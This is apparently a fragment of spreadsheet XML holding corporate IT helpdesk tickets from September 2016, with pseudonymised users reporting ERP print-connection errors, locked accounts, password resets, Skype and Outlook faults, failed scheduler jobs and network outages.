"we have a new issue today â€“ in the osterwalder bank the operators are signing in as themselves and being logged in under other usernames. in the attached screen shot edclhpkf ahjklpxm signed in with her login mcelrnr but was logged in as sanddry mcgfrtann (mcgatnsl). this is a new change â€“ previously it would log in the lauacyltoe hxgaycze person when you would open the window but now it's not even signing in the correct person."</t>
  </si>
  <si>
    <t>ie 10 needed for finance_app.</t>
  </si>
  <si>
    <t>ie 10 needed for finance_app._x000D_
-connected to the user system using teamviewer._x000D_
-uninstalled ie11 and reinstalled the ie10._x000D_
-user confirmed he was able to login to the finance_app._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>aymgdoqt eoxphqas</t>
  </si>
  <si>
    <t>uojdnrvs amchenrg</t>
  </si>
  <si>
    <t xml:space="preserve">the driver was not loaded properly. :  inc1554925 </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:hello,
i can't log in my pc due to updating of intel.the driver was not loaded properly.</t>
  </si>
  <si>
    <t xml:space="preserve">partner rtr team - email restrictions </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ntsowaem.jfgslyde@gmail.com
would like some assistance on trying to change the email access as approved below for our partner team.
ergtyic wrtyvis
manager, internal audit
ntsowaem.jfgslyde@gmail.com&lt;mailto:ntsowaem.jfgslyde@gmail.com&gt;
from: pal, sadipta [mailto:sadipta.pal@partner.com]
sent: monday, september 26, 2016 11:57 am
to: ntsowaem jfgslyde &lt;ntsowaem.jfgslyde@gmail.com&lt;mailto:ntsowaem.jfgslyde@gmail.com&gt;&gt;
subject: fw: partner rtr team - email restrictions
hi erirtc â€“ do you think sonia will be able to expedite this?
</t>
  </si>
  <si>
    <t>documents folder is missing</t>
  </si>
  <si>
    <t xml:space="preserve">documents folder is missing. </t>
  </si>
  <si>
    <t>xekdljqh cuqbgtlf</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to dg05 printer </t>
  </si>
  <si>
    <t>zylaexnv pvkzbduh</t>
  </si>
  <si>
    <t>ticket update on ticket_no0439545</t>
  </si>
  <si>
    <t>unable to print erp orders</t>
  </si>
  <si>
    <t>unable to connect to wifi</t>
  </si>
  <si>
    <t>7350: unable to hear audio on skype</t>
  </si>
  <si>
    <t>connection to system production_order_interface_app with destination production_order_interface_vendor-connc is not okay:</t>
  </si>
  <si>
    <t>when converting planned orders to production orders and releasing to print -- or just attempting to print anything from erp -- i am getting the following error message: connection to system production_order_interface_app with destination production_order_interface_vendor-connc is not okay: error when opening an rfc connection (cpic-call: (1).</t>
  </si>
  <si>
    <t>znxcupyi bhrwyxgu</t>
  </si>
  <si>
    <t xml:space="preserve">skype issue login issue </t>
  </si>
  <si>
    <t xml:space="preserve">hr_tool etime query </t>
  </si>
  <si>
    <t>efulzico epgfbhmt</t>
  </si>
  <si>
    <t>reset the password for cyvdluja oxrkfpbz on other / telephony_software</t>
  </si>
  <si>
    <t>cyvdluja oxrkfpbz</t>
  </si>
  <si>
    <t xml:space="preserve">unable to open outlook </t>
  </si>
  <si>
    <t>mnsejpby xsrdtvkw</t>
  </si>
  <si>
    <t>information pushed out of bar in machine status display</t>
  </si>
  <si>
    <t>in machine status window, the active hours of operation are displayed. in one instance hours were pushed out of bar making information unreadable (instead of showing 3.433 h, it appears as 433 h) adding pitcure</t>
  </si>
  <si>
    <t>invlaid order number (usa)</t>
  </si>
  <si>
    <t>we see order 2105783 in mii, which infact is material number.. need to know how this was entered as production order # in dashbankrd</t>
  </si>
  <si>
    <t>"work center allowed % difference" message showing up when threshold set to 100%</t>
  </si>
  <si>
    <t xml:space="preserve">when "confirm. qty. threshold" is set to 100%, system presents a warning even when we confirm planned order qty (which is exactly 100% of planned order qty)_x000D_
</t>
  </si>
  <si>
    <t>re: sent from snipping tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tfesaxip.cvorpnth@gmail.com_x000D_
_x000D_
help for work order 226048099._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>sent from snipping tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tfesaxip.cvorpnth@gmail.com_x000D_
_x000D_
help for work ord_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to login to ess</t>
  </si>
  <si>
    <t>erp help</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: znxcupyi.bhrwyxgu@gmail.com_x000D_
_x000D_
when converting planned orders to production orders and releasing to print, i am getting the following error message:_x000D_
[cid:image001.png@01SID_357e3.677aecd0]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>skype issue : personal certificate error.</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:i am unable to sign into skype - getting pop up message saying there is problem with a certificate.  any suggestions?</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3032 failed in job_scheduler at: 09/26/2016 10:41:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3032 failed in job_scheduler at: 09/26/2016 10:41:00</t>
  </si>
  <si>
    <t>assign to plm - cannot print work orders due to plsseald connection</t>
  </si>
  <si>
    <t xml:space="preserve">connection to system production_order_interface_app with destination  production_order_interface_vendor-connc is not okay: </t>
  </si>
  <si>
    <t>utebfkyi vlzaneuj</t>
  </si>
  <si>
    <t>wrong "stock status" symbols displayed in distributor_tool / companycenter (see attached email)</t>
  </si>
  <si>
    <t xml:space="preserve">high priority: gofmxlun kxcfrobq is getting errors in erp when she tries to create and order.  this is her main function and she is unable to proceed creating orders.
note from micthle follows
------------------------------------------
i'm receiving a server error when trying to create production orders in erp.  the error message says "connection to system production_order_interface_app with destination production_order_interface_vendor-connc is not okay: error when opening an rfc conneciton (cpic-call:1(1). 
--------------------------------------------
system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):
SID_34
enter user id of user having the issue:
letyenm
transaction code(s) the user needs or was working with:
co01
describe the issue:
see message above from micthle
</t>
  </si>
  <si>
    <t>rxuobtjg grcmqaxd</t>
  </si>
  <si>
    <t>pair formation error for orders which have right information / status in erp (usa)</t>
  </si>
  <si>
    <t>order 226047825, operation 40_x000D_
operator unable to "final" confirm the order using time event. gergryth looked up confirmation details in erp and everything looks correct. mii is throwing out "pair formation" error</t>
  </si>
  <si>
    <t>able to start a confirmed job in mii (usa)</t>
  </si>
  <si>
    <t>for order 226044182, operation 0015, we "final confirmed" job in mii but operator was able to "start" the job again - should've not happened as per logic we have defined</t>
  </si>
  <si>
    <t>unable to  get production order to print</t>
  </si>
  <si>
    <t>error reads_x000D_
connection to system production_order_interface_app with destination_x000D_
production_order_interface_vendor-connc is not okay:_x000D_
error when opening an rfc connection (cpic-call: '</t>
  </si>
  <si>
    <t>xplwmiyr pifoldxr</t>
  </si>
  <si>
    <t>erp printing issue : connection to system production_order_interface_app with destination production_order_interface_vendor-connc is not okay.</t>
  </si>
  <si>
    <t xml:space="preserve">erp printing issue : connection to system production_order_interface_app with destination production_order_interface_vendor-connc is not okay.
error when opening an rfc connection 
contact : </t>
  </si>
  <si>
    <t>erp production order printing issue : connection to system production_order_interface_app with destination production_order_interface_vendor-connc is not okay.</t>
  </si>
  <si>
    <t>erp printing issue : connection to system production_order_interface_app with destination production_order_interface_vendor-connc is not okay.
error when opening an rfc connection 
contact # :
ext 115</t>
  </si>
  <si>
    <t>access needed for vrtybundj to ticketing_tool</t>
  </si>
  <si>
    <t xml:space="preserve">please usa ycimqxdn wtubpdsz (vrtybundj) access to ticketing_tool  to view tickets similar to what pwc is usaed each year.
let me know if you have any questions.
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: saqbgcpl.ybfzcjiq@gmail.com_x000D_
_x000D_
good morning_x000D_
_x000D_
i need help assigning an account in crm.  the account was assigned to me by another se but the account has since been reassigned.  i am unable to reassign the account since i am not the primary sales._x000D_
</t>
  </si>
  <si>
    <t>saqbgcpl ybfzcjiq</t>
  </si>
  <si>
    <t>business_client login issue</t>
  </si>
  <si>
    <t>unrbafjx reyshakw</t>
  </si>
  <si>
    <t>erp is not letting me print orders message no. /dvsrepro/zrfc016</t>
  </si>
  <si>
    <t xml:space="preserve">,message no. /dvsrepro/zrfc016
</t>
  </si>
  <si>
    <t>qbevnaot shrqicog</t>
  </si>
  <si>
    <t>email information</t>
  </si>
  <si>
    <t xml:space="preserve">from: kthvr sertce 
sent: monday, september 26, 2016 6:31 pm
to: nwfodmhc exurcwkm
cc: rjodlbcf uorcpftk; zdcheloy aevzsogn
subject: amar fw: traversecity.service@company.com, important account information
hi it,
please investigate if this is accurate or spam.
traversecity.service@company.com  is an older email address for our usa customer service email box. it is listed on older literature that is still being used by customers.  we should keep it in operation.  please confirm.
</t>
  </si>
  <si>
    <t>expense report is blocked</t>
  </si>
  <si>
    <t>vtrwyeku gisxlqvt</t>
  </si>
  <si>
    <t xml:space="preserve">personal certificate error : skype issue </t>
  </si>
  <si>
    <t xml:space="preserve">unable to print production orders on erp printer bd24 </t>
  </si>
  <si>
    <t>unable to print production orders on erp printer bd24</t>
  </si>
  <si>
    <t>skrxopnw zjasxphv</t>
  </si>
  <si>
    <t xml:space="preserve">exporting contacts from outlook </t>
  </si>
  <si>
    <t>rwhavckz drvxyihj</t>
  </si>
  <si>
    <t>skype is not opening.</t>
  </si>
  <si>
    <t>pdvjanwx oprdiygs</t>
  </si>
  <si>
    <t>reinstall EU_tool \ewew8323851 \wrcktgbd wzrgyunp</t>
  </si>
  <si>
    <t>sales doc 35900112/000010 still shows as open in the backorder database.</t>
  </si>
  <si>
    <t xml:space="preserve">sales doc 35900112/000010 still shows as open in the backorder database.  sales doc has been pgid yet it still shows as open in the backorder database.  rpbdvgoy hxasnzjc suggested i enter a ticket.  according to aobrelcs suchytro this sales doc still looks open._x000D_
</t>
  </si>
  <si>
    <t>windows and erp account locked</t>
  </si>
  <si>
    <t>blank call / loud noise / gso</t>
  </si>
  <si>
    <t>skype is "not responding" when trying to do an on line meeting (screen share).</t>
  </si>
  <si>
    <t xml:space="preserve">attachment shows skype version, etc.
i am not able to join any skype meeting at this time due to this problem.
dvzgjsom ynpxqjlf
company usa facility
</t>
  </si>
  <si>
    <t>dvzgjsom ynpxqjlf</t>
  </si>
  <si>
    <t>password reset help from password_management_tool password manager.</t>
  </si>
  <si>
    <t>unable to open hr_engineering_tool for hours--controller access</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: umzcxfah.aoshpjiu@gmail.com
umzcxfah aoshpjiu
plant controller, us_plant
umzcxfah.aoshpjiu@gmail.com
</t>
  </si>
  <si>
    <t>yvfrgiba kezghiqa</t>
  </si>
  <si>
    <t>compatibility view settings</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tdkfuobm.qrtmaxos@gmail.com_x000D_
_x000D_
good morning,_x000D_
_x000D_
i keep receiving this error and have to close out of internet explorer each time.  when i re-open ie the website/database needs to be re-added to the compatibility view settings page.   this has happened to several other people in the ip department._x000D_
_x000D_
[cid:image001.jpg@01SID_357d7.2a03b820]_x000D_
_x000D_
[cid:image002.jpg@01SID_357d7.2a03b820]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>password reset request for erp prtgghj4k &amp; SID_67</t>
  </si>
  <si>
    <t>unable to login to hr_tool erp systems.</t>
  </si>
  <si>
    <t>archivierung von e-mails</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: anivdcor.rbmfhiox@gmail.com
[cid:image003.jpg@01SID_35804.fbc60480]
hallo it,
ich archiviere meine mails in einer ordnerstruktur.
leider finde ich immer wieder ordner, die plÃ¶tzlich keinen inhalt mehr haben
was lÃ¤uft hier falsch?
gruÃŸ
achim
anivdcor rbmfhiox
sales manager
sales germany
anivdcor.rbmfhiox@gmail.com&lt;mailto:anivdcor.rbmfhiox@gmail.com&gt;
company deutschland gmbh
geschÃ¤ftsfÃ¼hrer: rfwlsoej yvtjzkaw,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</si>
  <si>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tfbpzgcr ztqkbuic</t>
  </si>
  <si>
    <t xml:space="preserve">crm online issue </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:urgent help required crm issue crm ribbon is grey / not active same issue with home tab and track and set regarding options</t>
  </si>
  <si>
    <t>when i turn on crm, it comes on as my name as a manager. i get all the opportunities from all over the world. i want it to just have my crm information there.</t>
  </si>
  <si>
    <t>ms excel analysis addin: disabled</t>
  </si>
  <si>
    <t>can not populate the tranpertation zone in crm, when setting up a new customer.</t>
  </si>
  <si>
    <t>see attachments.  other csr were having the same issues on friday.9/23/16</t>
  </si>
  <si>
    <t>pfzljgwa wqdficxk</t>
  </si>
  <si>
    <t>blocked from expense report</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: proygkjt.mwetuhqf@gmail.com_x000D_
_x000D_
it,_x000D_
_x000D_
i was in the process of entering my expenses when i lost internet connection. now when trying to complete my expenses i receive the error below. please unblock._x000D_
_x000D_
[cid:image001.jpg@01SID_357d1.d3717ec0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>proygkjt mwetuhqf</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_585 failed in job_scheduler at: 09/26/2016 08:37:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_585 failed in job_scheduler at: 09/26/2016 08:37:00</t>
  </si>
  <si>
    <t>allow to edit contact info and upate back to erp.</t>
  </si>
  <si>
    <t xml:space="preserve">allow to edit contact info and update back to erp. this is w.r.t npr project go-live </t>
  </si>
  <si>
    <t>dhkovprf pltndoab</t>
  </si>
  <si>
    <t>outlook cannot connect to the server</t>
  </si>
  <si>
    <t>engineering_tool uploading issue</t>
  </si>
  <si>
    <t xml:space="preserve">global it service request (help@company.com)_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>no audio in dell 7350 2 in 1 tablet</t>
  </si>
  <si>
    <t>uacyltoe hxgaycze message</t>
  </si>
  <si>
    <t xml:space="preserve">hallo liebe kollegen,_x000D_
_x000D_
warum habe ich diese e-mail bekommen?_x000D_
hat jemand etwas modifiziert in meine e-mail postfach?_x000D_
_x000D_
Ã¼dvÃ¶zlettel / mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>erp accout had been locked</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qyidkvap.cxnfdjpk@gmail.com_x000D_
_x000D_
hello,sir_x000D_
_x000D_
   my erp accout had been locked. can you help me? and i try to log in password_management_tool passoword system to unlock all the accout, also can to log in._x000D_
  [cid:_foxmail.1@59ee6164-8282-a2ed-f56b-2bad30f2874e]_x000D_
_x000D_
_________________________________x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>qyidkvap cxnfdjpk</t>
  </si>
  <si>
    <t>reset the password for qekdgaim wagshrzl on erp / production / erp</t>
  </si>
  <si>
    <t xml:space="preserve">SID_34 erp production system - please reset my password i cannot log in and need to perform the goods receipt on po </t>
  </si>
  <si>
    <t>qekdgaim wagshrzl</t>
  </si>
  <si>
    <t>need to configure printers</t>
  </si>
  <si>
    <t>reset the password for Å‚ukasz kutnik on other / telephony_software - interaction desktop</t>
  </si>
  <si>
    <t xml:space="preserve">hey team,_x000D_
_x000D_
can you please reset my password for the telephony_software - interaction desktop?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>open connection for erp - oss #321013</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_7
enter user id of user having the issue: erp incident 321013/2016 (oss message)
provide access the same as this other user: mutoralkv
please open http and all necessary connections for erp and update in the oss message #321013</t>
  </si>
  <si>
    <t>help</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lanigpkq.qzhakunx@gmail.com_x000D_
_x000D_
hello,_x000D_
this morning i installed intel updates but while processing this my computer has blocked and i can not start windows.i can start it with safe mod.could you please connect my pc with team viewer_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xaertwdh.kcsagvpy@gmail.com_x000D_
_x000D_
hi_x000D_
please advise? i can not accesss collaboration_platform, it gives me this message._x000D_
_x000D_
[cid:image001.jpg@01SID_357f8.38677c00]_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>urgent: usb ports not working again.</t>
  </si>
  <si>
    <t xml:space="preserve">usb ports not working again after replacement. updated chipset drivers. issue persists. user wants the motherbankrd to be replaced.
phone: </t>
  </si>
  <si>
    <t>locked out again of erp prtgghj4k and SID_67</t>
  </si>
  <si>
    <t>locked out again of erp prtgghj4k and SID_67
this keeps happening way too often
telephone:</t>
  </si>
  <si>
    <t>jartnine m called to give a status update</t>
  </si>
  <si>
    <t xml:space="preserve">getting error while accessing it support review forms - pl refer above attachment </t>
  </si>
  <si>
    <t xml:space="preserve">pl refer attachment </t>
  </si>
  <si>
    <t>receiving error with open order book nightly report</t>
  </si>
  <si>
    <t>receiving error with open order book nightly report - please see attached screen shot</t>
  </si>
  <si>
    <t>omufjcxr ahypftjx</t>
  </si>
  <si>
    <t>SID_1 access</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: amrthruta.kadgdyam@company.com
hello team,
i have recently joined esg group as a programdnty engineer. request you to provide me access for SID_1 log in erp.
please do the needful.
[cid:image001.jpg@01SID_35813.0ecd3360]
</t>
  </si>
  <si>
    <t>pwvmkeza mzwqgejy</t>
  </si>
  <si>
    <t xml:space="preserve">network printer â€“ wy85 issue â€“ no print out  </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rjanhbde.owfkyjcp@gmail.com_x000D_
_x000D_
network printer â€“ wy85 issue â€“ no print out_x000D_
_x000D_
_x000D_
_x000D_
warm </t>
  </si>
  <si>
    <t>error message during document release</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: phqwmniy.kjucgqom@gmail.com
hello,
while releasing word file, drawings , route card showing error message server offline and document not get printed:
[cid:image001.jpg@01SID_35811.740c9ce0]
required help in resolving the issue,
[cid:image002.png@01SID_35811.740c9ce0]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</si>
  <si>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phqwmniy kjucgqom</t>
  </si>
  <si>
    <t>purchasing menue in shopping cart not working correct</t>
  </si>
  <si>
    <t>see attached screenshot</t>
  </si>
  <si>
    <t>application engineer database</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bmudkpie.qolrvbip@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
we are using the application database, but i can't access it, see below._x000D_
_x000D_
[cid:image001.png@01SID_357f1.9ea5f840]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">wifi &amp; lan not working in office </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: okycwstu.tvrnbgfs@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
there is a problem in wifi connection since last three days. also most of the lan connections are also not working._x000D_
_x000D_
pl. check and resolve the issue aerp._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>okycwstu tvrnbgfs</t>
  </si>
  <si>
    <t>peer certificate rejected by chainverifier error ('godaddy certificate bundles - g2' certificate issue)</t>
  </si>
  <si>
    <t>installation of 'godaddy certificate bundles - g2' (gd_bundle-g2.crt) is not proper in SID_25. we are getting peer certificate rejected by chainverifier error and not able to deploy and uacyltoe hxgaycze the functionality in dev. please refer ticket_no1537958 for earlier installation.</t>
  </si>
  <si>
    <t>hoyevanb ruwvniet</t>
  </si>
  <si>
    <t>forgot password.</t>
  </si>
  <si>
    <t>private address fields are enabled on employee master crm ui</t>
  </si>
  <si>
    <t>disable private address fields, new &amp; edit buttons on employee master crm ui</t>
  </si>
  <si>
    <t>tavsikpl dcrkwuny</t>
  </si>
  <si>
    <t>cancel duplicate miro entry po#5019256094 (5321)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: neokfwiy.ufriscym@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
please help to reverse it , the screen shot is as below:_x000D_
_x000D_
[cid:image001.png@01SID_3581b.e2456cf0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>reinstall company barcode fÃ¼r ewew8323753 \zlqfptjx xnklbfua</t>
  </si>
  <si>
    <t xml:space="preserve">kein email eingang von der adresse p.eggert@karl-roll.de. </t>
  </si>
  <si>
    <t>es kann von dieser adresse nichts empfangen oder gesendet werden.</t>
  </si>
  <si>
    <t>wrong data in crm (wrong data signed to contact person during complaint creation)</t>
  </si>
  <si>
    <t>we have opened complaint 7611184115: contact person is bnmdslzh qyinrmaf. we see in crm  signed 255948  number to contact person bnmdslzh qyinrmaf. when we opened this number we could see data other customet (mail and number). in complaint form are printed wrong data  - please see attached</t>
  </si>
  <si>
    <t>erp SID_34 password reset request.</t>
  </si>
  <si>
    <t>reference to  ticket_no1553927 / chg0034452</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ytwmgpbk.cpawsihk@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
could you please re-open this ticket. still the request is not resolved._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3181 failed in job_scheduler at: 09/26/2016 05:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3181 failed in job_scheduler at: 09/26/2016 05:00:00</t>
  </si>
  <si>
    <t>query : change the screen saver.</t>
  </si>
  <si>
    <t xml:space="preserve">query : change the screen saver._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">work center to be updated in pm order confirmation screen </t>
  </si>
  <si>
    <t>hi _x000D_
_x000D_
pm work center to be updated to pm order operations.</t>
  </si>
  <si>
    <t>ctngxwqa arbzlpmh</t>
  </si>
  <si>
    <t>vpn on pc edmlx000001 can't work (urgent)</t>
  </si>
  <si>
    <t xml:space="preserve">efyumrls gqjcbufx (finance and administration manager) is working with a new pc win 10, not company imaged._x000D_
everything is working, except symantec endpoint protection. i can't install it. it goes in error._x000D_
as antivirus, she has windows defender._x000D_
unfortunately when she run the vpn, a message appear and it seems that she can't run the vpn due tu an antivirus not updated._x000D_
_x000D_
she will be out of office for a few days this week, and she really needs the vpn connection._x000D_
_x000D_
could you please check the issue ?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ziwkespl dyehbrst</t>
  </si>
  <si>
    <t>skype meeting option is not showing up in calendar.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nxlzpgfr.rlqowmyt@gmail.com_x000D_
_x000D_
i am unable to open the mails please refer the screen shot_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>nxlzpgfr rlqowmyt</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
received from: zuxcfonv.nyhpkrbe@gmail.com_x000D_
_x000D_
gso,_x000D_
_x000D_
please kindly unlock and reset password for erp SID_34 account zhhtyangq ,</t>
  </si>
  <si>
    <t xml:space="preserve">launch adobe acrobat </t>
  </si>
  <si>
    <t xml:space="preserve">
name:melerowicz
language:
browser:microsoft internet explorer
email:ubiqcrvy.mxjcnqfs@gmail.com
customer number:
telephone:+
summary:hi it-team, 
i would like to open a pdf document but i got the message: before proceeding you must first launch adobe acrobat and accept the end user licence agreement. my user: melthryerj   could you please help </t>
  </si>
  <si>
    <t>network outage poncacity-schlumhdyhter-dmvpn-rtr located at usa is down. since 2:29 am on o9/26/16</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    __no_______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____________2:29 am __on o9/26/16________x000D_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</si>
  <si>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account unlock - erp SID_34</t>
  </si>
  <si>
    <t xml:space="preserve">unlocked account using password_management_tool 
from: wgpimkle kijhcwur [mailto:wgpimkle.kijhcwur@gmail.com] 
sent: monday, september 26, 2016 12:42 pm
to: nwfodmhc exurcwkm &lt;nwfodmhc.exurcwkm@gmail.com&gt;
subject: re: please unlock an id (sugisdfy)
importance: high
sorry again and again
i could unlock through password_management_tool.
</t>
  </si>
  <si>
    <t xml:space="preserve">password </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: woxrljif.qymrszdk@gmail.com_x000D_
_x000D_
hi_x000D_
_x000D_
i changed my password last week now the laptop won't let me in._x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>woxrljif qymrszdk</t>
  </si>
  <si>
    <t>problems with approval in universal work list</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dkinobsv.wymgzcrh@gmail.com
dear it,
please help!
i need to approve this but cannot
the following expense report has been submitted for your approval:
personnel no.:    111319uy36  )
expense report no.:    2711125712
start date:    19.07.2016 00:00:00
end date:    23.08.2016 00:00:00
total costs:    usd 2.215,29
reimbursement amount:    usd 1.783,12
to review this expense report in full, please log into your universal worklist on manager self-service.
i get this message
[cid:image001.jpg@01SID_357dc.d57e64c0]
--
mit freundlichen grÃ¼ÃŸen/ best </t>
  </si>
  <si>
    <t>lean tracker not working</t>
  </si>
  <si>
    <t>yhroaeqj djtyroha</t>
  </si>
  <si>
    <t xml:space="preserve">unable to process in ecs </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rxoynvgi.ntgdsehl@gmail.com
hi it team
kindly please assist as we unable to process dn 9169308075 in ecs.
ecs system prompted below message.
hi sujitra
kindly note that we unable to process dn 9169308075 in ecs and most probably this order will hold for today shipping, pending for solution.
[cid:image001.png@01SID_3580e.9c668960]
hydstheud mddwwyleh
operation supervisor
company distribution services of asia pte ltd
( asia regional distribution centre)
email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;</t>
  </si>
  <si>
    <t>dir 71913895  nxd  000  00  ac locked by user</t>
  </si>
  <si>
    <t>dir 71913895  nxd  000  00  ac can't be opened for edit as it seems to be locked in the database (by wagfrtneh). dir is within status ac, all main originals seem to be checked in. so please unlock in the database.</t>
  </si>
  <si>
    <t>support fÃ¼r rechner  messvorrichtung  \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t xml:space="preserve">the purchasing doesn't work </t>
  </si>
  <si>
    <t xml:space="preserve">there is no option in purchasing , check status is missed </t>
  </si>
  <si>
    <t>rechner we_wu160 funktioniert nicht .</t>
  </si>
  <si>
    <t>rechner fÃ¼r viotto funktioniert nicht</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2645 failed in job_scheduler at: 09/26/2016 03:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2645 failed in job_scheduler at: 09/26/2016 03:30:00</t>
  </si>
  <si>
    <t>node ldiw8511217sf located at usa village is down since 9/25/2016 2:44 pm</t>
  </si>
  <si>
    <t>hana report</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bujiesrg.zopcrshl@gmail.com
dear all,
my hana report can't be refresh , can you help to check ?
[cid:image001.png@01SID_35806.dd83d2c0]
bujiesrg zopcrshl
specialist accounting and reporting
bujiesrg.zopcrshl@gmail.com&lt;mailto:bujiesrg.zopcrshl@gmail.com&gt;
</t>
  </si>
  <si>
    <t>truview application is down</t>
  </si>
  <si>
    <t xml:space="preserve">truview application is down. we are not getting the alarms and also i saw today that the application is also down. </t>
  </si>
  <si>
    <t>looks like the tzornbldf network account is locked it needs to be unlocked aerp</t>
  </si>
  <si>
    <t>the tzornbldf account is used to in 90% of the dashbankrds in reporting_tool.  this will affect 100's of sales employees/managers/directors as they will not be able to access their dashbankrds.</t>
  </si>
  <si>
    <t xml:space="preserve">locked me out of erp </t>
  </si>
  <si>
    <t xml:space="preserve">
i tried to change my password by password_management_tool password manager, i got an error message, but the password seems changed but i don't remember the entered code. 
iewnguxv bufwxeiy has reset the windows password, by i can't enter erp. 
can you please reset me in password_management_tool passwprd manager. 
</t>
  </si>
  <si>
    <t>issue to create skype meeting request on outlook</t>
  </si>
  <si>
    <t xml:space="preserve">when i try to create skype meeting on outlook, there is no skype meeting button on outlook so i couldn't crete meeting request. please fix it. </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1338 failed in job_scheduler at: 09/26/2016 02:28:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1338 failed in job_scheduler at: 09/26/2016 02:28:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1332 failed in job_scheduler at: 09/26/2016 02:26:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1332 failed in job_scheduler at: 09/26/2016 02:26:00</t>
  </si>
  <si>
    <t>tickets for jost berfkting classified as "usa" / usa users need properly classified in ticketing_tool.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mynfoicj.riuvxdas@gmail.com_x000D_
_x000D_
gso,_x000D_
_x000D_
could you please verify why ticketing_tool tickets for dxyvfuhr uyfqgomx are classified as usa tickets? he is not usa, but ceo in europe of company. i checked two other users from switzerland, were the message did not display as it is correct. i actually thought the location would determine if users are from usa or not. can you advise what the issue with his user is? it needs correction._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>the unit prices of order #35990512 , item ! ~ 8 cannot be revised</t>
  </si>
  <si>
    <t xml:space="preserve">we need to revise the pirces for order#35990512 to zno, 7800 for all the items._x000D_
i changed for item #9 ~ #11, but cannot change for #1 ~ #8, please check and help, </t>
  </si>
  <si>
    <t>unable to login to erp SID_34 account</t>
  </si>
  <si>
    <t>rdpctwam jpweibfl</t>
  </si>
  <si>
    <t>delivery note creation request</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fbvpcytz.nokypgvx@gmail.com_x000D_
_x000D_
hello it team,_x000D_
_x000D_
could you please create delivery note for below order?_x000D_
we got the error message hence we cannot issue the delivery noteâ€¦_x000D_
_x000D_
